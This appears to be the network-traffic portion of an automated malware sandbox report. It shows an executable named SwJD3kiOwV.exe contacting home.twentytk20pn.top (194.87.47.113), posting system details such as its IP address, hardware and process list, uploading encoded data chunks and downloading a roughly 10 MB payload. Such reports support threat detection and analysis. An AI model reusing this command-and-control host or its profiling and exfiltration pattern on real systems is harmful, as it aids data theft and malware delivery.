Dec 19, 2024 08:47:54.805253983 CET	443	49790	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.805548906 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.805566072 CET	443	49790	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.809227943 CET	443	49790	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.809393883 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.845376015 CET	443	49791	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.845783949 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.845797062 CET	443	49791	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.846839905 CET	443	49791	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.846899986 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.932910919 CET	443	49793	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.933274984 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.933284998 CET	443	49793	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.934726000 CET	443	49793	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.934781075 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:55.507476091 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:55.507498026 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:55.507570028 CET	49788	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:55.507653952 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:55.869924068 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:55.989398956 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:55.989500999 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:55.989913940 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109616995 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109632015 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109649897 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109708071 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109735966 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109739065 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109772921 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109786987 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109808922 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109813929 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109821081 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109850883 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.109853983 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109869003 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.109914064 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:56.110522032 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229381084 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229394913 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229419947 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229429007 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229487896 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.229618073 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:56.272476912 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:57.630501986 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:57.630651951 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:57.630758047 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:57.631071091 CET	49804	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:57.750591993 CET	80	49804	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:58.793194056 CET	49813	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:58.912810087 CET	80	49813	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:58.913033009 CET	49813	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:58.913451910 CET	49813	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:59.033027887 CET	80	49813	194.87.47.113	192.168.2.7
Dec 19, 2024 08:48:00.461152077 CET	80	49813	194.87.47.113	192.168.2.7
Dec 19, 2024 08:48:00.461405993 CET	80	49813	194.87.47.113	192.168.2.7
Dec 19, 2024 08:48:00.461477995 CET	49813	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:48:00.461620092 CET	49813	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:48:00.581044912 CET	80	49813	194.87.47.113	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 08:47:13.249629974 CET	57639	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:13.249629974 CET	57639	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:13.386964083 CET	53	57639	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:13.553605080 CET	53	57639	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:16.565291882 CET	62724	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:16.565604925 CET	62724	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:16.702212095 CET	53	62724	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:16.702233076 CET	53	62724	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:19.936223030 CET	64267	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:19.936275959 CET	64267	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:20.075786114 CET	53	64267	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:20.075805902 CET	53	64267	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:44.645992041 CET	59349	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:44.646044016 CET	59349	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:44.785535097 CET	53	59349	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:44.787406921 CET	53	59349	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:47.846385002 CET	59351	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:47.846427917 CET	59351	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:47.984719992 CET	53	59351	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:47.985471010 CET	53	59351	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:52.478297949 CET	53	63813	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:52.496233940 CET	53	58308	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:52.500910997 CET	62367	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:52.501082897 CET	51557	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:52.638201952 CET	53	51557	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:52.638303041 CET	53	62367	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:55.732337952 CET	58412	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:55.732388020 CET	58412	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:55.868912935 CET	53	58412	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:55.869057894 CET	53	58412	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:58.646342993 CET	54314	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:58.646409035 CET	54314	53	192.168.2.7	1.1.1.1
Dec 19, 2024 08:47:58.787148952 CET	53	54314	1.1.1.1	192.168.2.7
Dec 19, 2024 08:47:58.787168026 CET	53	54314	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 08:47:13.249629974 CET	192.168.2.7	1.1.1.1	0x57f6	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:13.249629974 CET	192.168.2.7	1.1.1.1	0x75cd	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 19, 2024 08:47:16.565291882 CET	192.168.2.7	1.1.1.1	0x334c	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:16.565604925 CET	192.168.2.7	1.1.1.1	0xabc6	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 19, 2024 08:47:19.936223030 CET	192.168.2.7	1.1.1.1	0xffd6	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:19.936275959 CET	192.168.2.7	1.1.1.1	0x7604	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 19, 2024 08:47:44.645992041 CET	192.168.2.7	1.1.1.1	0x73bf	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:44.646044016 CET	192.168.2.7	1.1.1.1	0x6368	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 19, 2024 08:47:47.846385002 CET	192.168.2.7	1.1.1.1	0x6aab	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:47.846427917 CET	192.168.2.7	1.1.1.1	0xe49b	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 19, 2024 08:47:52.500910997 CET	192.168.2.7	1.1.1.1	0x2d3c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:52.501082897 CET	192.168.2.7	1.1.1.1	0x1e98	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 19, 2024 08:47:55.732337952 CET	192.168.2.7	1.1.1.1	0x4233	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:55.732388020 CET	192.168.2.7	1.1.1.1	0x80f7	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 19, 2024 08:47:58.646342993 CET	192.168.2.7	1.1.1.1	0x171d	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:58.646409035 CET	192.168.2.7	1.1.1.1	0x7afb	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 08:47:13.553605080 CET	1.1.1.1	192.168.2.7	0x57f6	No error (0)	httpbin.org	98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:13.553605080 CET	1.1.1.1	192.168.2.7	0x57f6	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:16.702212095 CET	1.1.1.1	192.168.2.7	0x334c	No error (0)	home.twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:20.075786114 CET	1.1.1.1	192.168.2.7	0xffd6	No error (0)	home.twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:44.785535097 CET	1.1.1.1	192.168.2.7	0x73bf	No error (0)	twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:47.984719992 CET	1.1.1.1	192.168.2.7	0x6aab	No error (0)	twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:52.638201952 CET	1.1.1.1	192.168.2.7	0x1e98	No error (0)	www.google.com		65	IN (0x0001)	false
Dec 19, 2024 08:47:52.638303041 CET	1.1.1.1	192.168.2.7	0x2d3c	No error (0)	www.google.com	172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:55.869057894 CET	1.1.1.1	192.168.2.7	0x4233	No error (0)	twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:47:58.787168026 CET	1.1.1.1	192.168.2.7	0x171d	No error (0)	home.twentytk20pn.top	194.87.47.113	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.twentytk20pn.top

twentytk20pn.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:16.826428890 CET	12360	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 559914 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 34 34 33 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734594435", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 19, 2024 08:47:16.947685003 CET	7416	OUT	Data Raw: 6d 31 56 77 75 49 77 6d 4b 78 4e 65 69 72 46 51 62 48 39 76 79 5c 2f 77 44 73 71 5c 2f 55 54 38 68 45 6f 6f 6f 6f 41 4b 68 66 5c 2f 41 46 6b 64 65 71 66 73 36 66 42 4c 53 5c 2f 32 6d 5c 2f 77 42 71 7a 39 6e 76 39 6e 6a 78 4c 71 2b 70 61 4e 34 4d Data Ascii: m1VwuIwmKxNeirFQbH9vy\/wDsq\/UT8hEooooAKhf\/AFkdeqfs6fBLS\/2m\/wBqz9nv9njxLq+paN4M+I+v+Lr3xjLpExttRv8AQfAPgzVvHN\/oltdBWNs2uWeiXWkrclJRZzXkN95Mr2qKf6bk\/wCCMH\/BNdERW\/ZyeVlVVaR\/jB8eA8hAALuIvifHGHcjcwjjRASdiKuFH8D+Mn01818N\/E\/ivw34Y8J8Dxf\/A
Dec 19, 2024 08:47:16.947910070 CET	4944	OUT	Data Raw: 61 70 58 54 5c 2f 41 45 4a 5c 2f 34 69 56 76 2b 72 4c 66 5c 2f 4e 6a 50 5c 2f 77 41 52 46 66 74 4a 5c 2f 77 41 45 38 66 32 33 72 58 39 76 6e 34 48 36 39 38 59 37 66 34 62 58 48 77 73 6c 38 4f 5c 2f 45 76 58 66 68 74 66 65 47 5a 76 46 6b 66 6a 53 Data Ascii: apXT\/AEJ\/4iVv+rLf\/NjP\/wARFftJ\/wAE8f23rX9vn4H698Y7f4bXHwsl8O\/EvXfhtfeGZvFkfjSOS60bw54R8TJqlprieHfCrSW91ZeL7OFrabRoJLe6tblRJcRGKZ\/5Tf8Agp\/4Z+DX7Lnh34I\/sF\/Df4eeBpfiR8H\/AAtofjL9or48DwFotn4\/8ffEjxjpL65b+H7Dxtd6Uvi2bwNpdlr8+p2umDWLnSHtdQ
Dec 19, 2024 08:47:16.948187113 CET	4944	OUT	Data Raw: 2f 4f 63 31 42 38 6e 7a 5c 2f 36 7a 76 39 50 38 5c 2f 77 42 4d 64 73 31 63 38 6e 50 2b 73 49 62 2b 58 36 56 57 6b 6a 2b 39 76 2b 5c 2f 78 36 66 35 2b 75 4b 44 55 68 39 45 54 5c 2f 6c 6e 5c 2f 41 4b 72 5c 2f 41 44 5c 2f 2b 72 32 34 70 67 44 74 39 Data Ascii: /Oc1B8nz\/6zv9P8\/wBMds1c8nP+sIb+X6VWkj+9v+\/x6f5+uKDUh9ET\/ln\/AKr\/AD\/+r24pgDt91PMP1I\/Wp9r\/AO5z\/q\/+W\/T2z1qDy3+T+PH+R+n0\/XNB0B5afxpGn\/LXuJ+lU2X5v9j\/AKafuLf\/ALdO3X\/69XNv7v5\/zk\/n+f8ALHUVDtj+f+Py\/wB73NB2U+vyKxY7dn1\/z+HH+TTJW\/d73\
Dec 19, 2024 08:47:16.948240995 CET	4944	OUT	Data Raw: 66 74 50 4c 38 66 2b 41 61 48 69 33 78 31 5c 2f 77 43 52 52 30 37 5c 2f 41 4c 47 4f 30 5c 2f 38 41 54 5a 71 39 66 52 58 37 46 48 37 5a 48 77 64 5c 2f 59 79 2b 43 5c 2f 77 43 30 4c 34 6c 38 4d 2b 47 5c 2f 69 44 71 76 37 61 6e 78 4c 38 4d 33 58 77 Data Ascii: ftPL8f+AaHi3x1\/wCRR07\/ALGO0\/8ATZq9fRX7FH7ZHwd\/Yy+C\/wC0L4l8M+G\/iDqv7anxL8M3Xw6+FXjYaP4Zh+Hfwn8Iaq1imra9Y6\/L4rk8Tt4xnke41iOOPwVLZfbfDfhnTPt8en6hrsx4XXPD+keJLNdP1qzW9tEnS5SIzXEBSeNJI0kWW1lhmVgksicSAFXYMCDX7df8EuP+Cav7FH7RnwA8Y+NvjL8Fv+Ex8T
Dec 19, 2024 08:47:16.950481892 CET	2472	OUT	Data Raw: 33 72 55 73 68 5c 2f 32 4e 6e 5c 2f 58 53 58 39 65 6e 2b 63 64 4b 5a 5c 2f 63 54 62 48 7a 31 37 65 54 39 4b 44 75 49 5a 4e 6e 79 50 39 78 38 5c 2f 77 44 50 58 6a 5c 2f 49 37 64 76 77 70 6e 7a 5c 2f 41 48 30 54 66 5c 2f 30 37 5c 2f 67 50 7a 50 39 Data Ascii: 3rUsh\/2Nn\/XSX9en+cdKZ\/cTbHz17eT9KDuIZNnyP9x8\/wDPXj\/I7dvwpnz\/AH0Tf\/07\/gPzP9OKcPuR\/wDtT\/j4\/wA+tNP3nfnfH+68z\/OTyfpQHtf734f8Ag2+W2\/\/ALZRR\/5\/z39Ki8tI\/wBy6f8A6u\/9B\/hVqST76D5+48yX9xx\/nv8A0qBtnmfOkr\/uh5v\/ANfk4\/oa09n5\/h\/wToGSeT
Dec 19, 2024 08:47:17.067389965 CET	4944	OUT	Data Raw: 50 38 39 5c 2f 72 6e 69 73 7a 51 5a 75 38 76 65 34 51 62 5c 2f 4e 48 37 76 5c 2f 41 4a 37 66 54 2b 58 2b 65 54 61 38 6e 7a 70 35 6d 5c 2f 6d 54 5c 2f 57 6e 39 39 37 32 6c 6f 4b 65 75 56 5a 45 52 39 37 5c 2f 36 33 7a 4a 4a 66 38 38 34 7a 55 52 62 Data Ascii: P89\/rniszQZu8ve4Qb\/NH7v\/AJ7fT+X+eTa8nzp5m\/mT\/Wn9972loKeuVZER97\/63zJJf884zURbn7+yEy\/vf+eGc\/56fl6aez8\/w\/4J0H7u0VieJNes\/DGh6lr+oHFlpdubm4O4LiMOqfeIIHLjnBrtvinpGjfCu4+IlpL8V\/g38Q734NfFvw58EPjTpPw31r4kvrHwn+IXi\/TvFepeFtN8U23xL+E3wxstU0
Dec 19, 2024 08:47:17.067481041 CET	4944	OUT	Data Raw: 49 69 70 34 58 42 7a 79 5c 2f 47 53 72 31 61 63 38 4a 50 6b 2b 53 38 52 75 4d 50 70 70 65 4a 5c 2f 43 4f 63 63 42 63 56 38 46 30 4b 6d 51 5a 31 51 79 33 46 5a 6e 48 41 5a 50 6b 75 45 71 52 6f 34 44 4e 63 70 7a 66 4c 6f 7a 7a 43 47 5a 31 49 59 4f Data Ascii: Iip4XBzy\/GSr1ac8JPk+S8RuMPppeJ\/COccBcV8F0KmQZ1Qy3FZnHAZPkuEqRo4DNcpzfLozzCGZ1IYOricdDK6mFw9SVPE5hSrU44WnWp105YVFY+ga7p\/iTSrXV9MkMtrdJldyskkci8SQyowDJLE2VdGAZWBBAOQNiv7Vo1qWJo0sRh6kK1CvThVo1qUlOnVpVIqUKkJxbjKE4tSjJNpppo\/z\/q4bEYPEYjCYuhVw2K
Dec 19, 2024 08:47:17.067507982 CET	2472	OUT	Data Raw: 44 37 66 35 5c 2f 43 67 33 70 31 50 31 73 37 62 5c 2f 31 5c 2f 58 6e 55 71 4f 58 37 35 5c 2f 7a 33 4e 57 63 66 66 37 35 5c 2f 6e 31 5c 2f 72 56 62 5c 2f 6c 70 5c 2f 6e 2b 37 57 33 76 5c 2f 77 42 33 38 53 78 6b 6e 33 66 76 5c 2f 77 43 66 7a 50 38 Data Ascii: D7f5\/Cg3p1P1s7b\/1\/XnUqOX75\/z3NWcff75\/n1\/rVb\/lp\/n+7W3v\/wB38Sxkn3fv\/wCfzP8Aj+HFQ\/nvz\/n2xj\/OKnl7\/wC7\/jUHf+\/+fH8xWJ0A\/X8P6mq79fwqWoJP++P8\/wCff3oOgrsH\/ufJ\/wBM8+vt+H+c0xs9\/UdP9f07e9WE+6Px\/maikj\/v\/wDbX\/PXuf8AIFBp9Z\/q3\/2ozcf
Dec 19, 2024 08:47:17.067523003 CET	2472	OUT	Data Raw: 33 6c 66 76 50 38 41 6c 72 5c 2f 4c 36 64 66 35 30 65 7a 38 5c 2f 77 41 50 2b 43 41 7a 79 5c 2f 33 63 4b 4d 35 64 50 39 49 38 33 38 71 50 6b 43 6f 38 7a 2b 58 5c 2f 41 4d 39 65 33 2b 6a 5c 2f 41 4f 66 78 5c 2f 4b 69 54 66 49 72 70 39 7a 72 33 5c Data Ascii: 3lfvP8Alr\/L6df50ez8\/wAP+CAzy\/3cKM5dP9I838qPkCo8z+X\/AM9e3+j\/AOfx\/KiTfIrp9zr3\/wAjnn8KZ5j8On2fyfXyv3H\/AF62n+TmszoIW+9vRJE8v9P8\/wCe1KUf+BNnmf8ALT3H+e1S\/wCrVHfzH\/56+YPz\/HH+elM8x9r73\/1fMRk\/59\/+nTn69vwzQAz52+4kaJn\/AFf\/AC34\/wCnv+X5mm
Dec 19, 2024 08:47:17.113058090 CET	27192	OUT	Data Raw: 6c 50 46 59 61 46 4b 6e 69 73 77 77 2b 4d 37 75 43 76 32 67 65 65 63 49 63 45 38 4d 63 46 76 77 36 34 65 7a 66 44 63 4c 34 48 4b 38 4c 67 73 56 6a 71 2b 49 6c 4f 70 56 79 6e 50 4d 52 78 42 51 71 56 61 4c 6c 4b 69 71 65 4a 78 31 65 4e 4c 48 78 6f Data Ascii: lPFYaFKnisww+M7uCv2geecIcE8McFvw64ezfDcL4HK8LgsVjq+IlOpVynPMRxBQqVaLlKiqeJx1eNLHxoQoVcXgsNg8PWrSlgsHWw\/m\/h34yeI\/jl8VF8e634guvF+pan+zZ+ytZfEzxZqGm69pmq6\/wDH\/wAN\/Af4c+Gvjdf6yNf0zTbjV9Ym+IGma9\/afiW3W7svEl4s2t22p6st82o3HsVVLXT7Cx3fYrG0s9\/3
Dec 19, 2024 08:47:19.838864088 CET	183	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 19 Dec 2024 07:47:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 26 Connection: close Data Raw: 48 69 47 47 48 45 46 45 67 6c 59 43 7a 37 36 67 31 37 33 34 35 39 34 34 33 39 Data Ascii: HiGGHEFEglYCz76g1734594439

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49707	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:20.196866989 CET	126	OUT	GET /WEIsmPfDcpBFJozngnYN1734366322?argument=HiGGHEFEglYCz76g1734594439 HTTP/1.1 Host: home.twentytk20pn.top Accept: /
Dec 19, 2024 08:47:21.732074022 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 19 Dec 2024 07:47:21 GMT Content-Type: application/octet-stream Content-Length: 10816560 Connection: close Content-Disposition: attachment; filename="wmhxbWrMmpOSXnEQUlz;" Last-Modified: Mon, 16 Dec 2024 16:25:22 GMT Cache-Control: no-cache ETag: "1734366322.858812-10816560-3400407440" Data Raw: d5 59 3c ac 4f c5 f6 d3 51 7e 47 47 26 fc 67 8e 84 c9 d0 b9 c8 1a b5 f2 9f 36 58 4e 2a 47 78 b3 71 d6 90 99 2c 75 71 ee 05 07 6f e4 46 9c 81 25 65 1e b9 5c 4c cd 26 06 a2 8a 7f f2 65 9e 16 dd 0a 62 a6 54 b4 af c9 89 f9 fa 9d 0d e0 ee 45 13 e3 62 b4 7a 27 ea 09 83 39 68 2b 57 d4 60 b5 5e e3 8d 8a ca f3 0f 65 59 61 a9 31 84 ec 75 18 9f 24 5a b0 43 dc a9 88 a2 32 72 8c 21 0b 74 3a 35 c1 bb ab 53 27 66 6a 20 e9 40 bb 35 77 dc 6b 55 70 51 7b b4 f9 80 55 0a bb 5b 04 23 b9 54 94 13 ce 2c 0f 64 c3 37 11 71 7d c1 39 1d bd 7e 1d a8 c2 76 08 b7 bb e4 83 f9 ca ca 3f d4 dc a1 68 0b fd 09 4e df f0 a3 4b ae ec 74 e9 a6 d0 f3 8f 73 8f bf ae 9d b3 e6 e5 e8 01 1a e2 90 67 05 cf 14 df 94 91 9a ac 00 db 92 f7 18 9e cd ca 55 e2 d5 d7 f2 87 f7 fa 3e f6 0f 54 99 fb 85 6f 27 8f 0b 94 d4 df 07 de d7 fd d7 24 7d 3b e8 61 d3 13 51 b5 02 12 b2 41 76 6e ac e5 f8 d0 76 a2 58 a0 af b0 ed e4 17 7d e1 24 1c 2f d5 3b 76 8d 8f 0c ad 07 bf 79 f7 c3 7c ae 13 ae 2d b2 54 c1 39 70 46 45 22 5c aa 6d 59 19 8b e5 22 88 83 18 44 c0 92 bf b1 [TRUNCATED] Data Ascii: Y<OQ~GG&g6XNGxq,uqoF%e\L&ebTEbz'9h+W`^eYa1u$ZC2r!t:5S'fj @5wkUpQ{U[#T,d7q}9~v?hNKtsgU>To'$};aQAvnvX}$/;vy\|-T9pFE"\mY"D7kamD}?@ZY m>]De!cYJ<vG}%o$QWP8.jxx%_xHVFC:\Y<,8/w"QQt4ep\6OC)['[VFdN_btA9AF]"e$9&-;( NGU1ht)#i$00_W~W<"]::Uxw[\|yJ~n7isY2_(q8""~@/t1@"n6]rtYukb.]PxC3l&f-KMU;5^>>?eRL?#14rYlG(~ {9Ps!jRn@f^KI/DSLKs4`dX/
Dec 19, 2024 08:47:21.732251883 CET	224	IN	Data Raw: a0 9f b7 ec 69 1f 77 c1 b8 9d b5 6f ff 5c e2 49 9b 40 24 f4 94 2e 6b 10 0a 2a 7d 78 3d a2 5d 2e 64 71 a5 1c fe 68 57 df 5f 96 f6 4c 28 9f 74 29 e4 0e 1d 56 23 c2 6c 8a c0 b4 eb 62 28 4c ee 7b 5a c4 2f e5 ef 72 84 32 e9 e1 08 27 06 4a 55 a3 38 47 Data Ascii: iwo\I@$.k*}x=].dqhW_L(t)V#lb(L{Z/r2'JU8G~FbVp9(C4.BqN%7aNQ4/2M]ur"sTJj6(kD8ctTBHUE:zm[Y26
